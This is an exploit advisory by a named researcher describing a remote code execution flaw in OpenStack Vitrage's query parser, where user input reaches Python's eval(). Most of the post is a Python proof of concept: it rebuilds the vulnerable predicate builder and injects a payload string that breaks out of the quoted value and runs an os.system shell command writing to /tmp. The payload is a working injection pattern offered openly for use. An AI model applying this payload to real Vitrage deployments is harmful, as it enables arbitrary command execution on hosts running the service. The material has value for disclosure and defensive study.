=============================================================================================================================================
| # Title     : OpenStack 12.0.1, 13.0.0, 14.0.0, and 15.0.0 Vitrage Query Parser via Remote Code Execution in Unsafe eval() Usage          |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://www.openstack.org/                                                                                                  |
=============================================================================================================================================

[+] Summary    :  CVE-2026-28370 A Remote Code Execution (RCE) vulnerability exists in the query parser of OpenStack Vitrage prior to versions 12.0.1, 13.0.0, 14.0.0, and 15.0.0.

The issue resides in the _create_query_function method located in:

vitrage/graph/query.py

The vulnerability is caused by unsafe use of Python’s eval() function when dynamically constructing query predicates. User-controlled input supplied via the Vitrage API is embedded directly into a string expression that is later executed with eval().

Because the input is not safely sanitized or parsed, an authenticated user with API access can inject arbitrary Python code. This allows execution of system-level commands on the host running the Vitrage service, under the service account privileges.

[+] POC   :  https://www.youtube.com/watch?v=IjBH-hu3UfQ


import os

def _evaluable_str(value):
    """Wraps the value in single quotes if it's a string."""
    if isinstance(value, str):
        return "'" + value + "'"
    return str(value)

def create_predicate(query_dict):
    """
    Simplified version of the vulnerable logic.
    It builds a string and passes it to eval().
    """

    key, val = list(query_dict['=='].items())[0]

    expression = f"(item.get('{key}') == {_evaluable_str(val)})"
    full_cmd = "lambda item: " + expression
    
    print(f"Executing built string: {full_cmd}")
    return eval(full_cmd)
malicious_payload = "') or __import__('os').system('id > /tmp/hack.txt') or ('"

query = {
    "==": {
        "ANY_KEY": malicious_payload
    }
}


try:

    match = create_predicate(query)

    match({'ANY_KEY': 'Pwnd By indoushka'})
    
    print("\n[+] Success: Check /tmp/hack.txt for the command output.")
except Exception as e:
    print(f"\n[-] Failed to execute: {e}")


	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================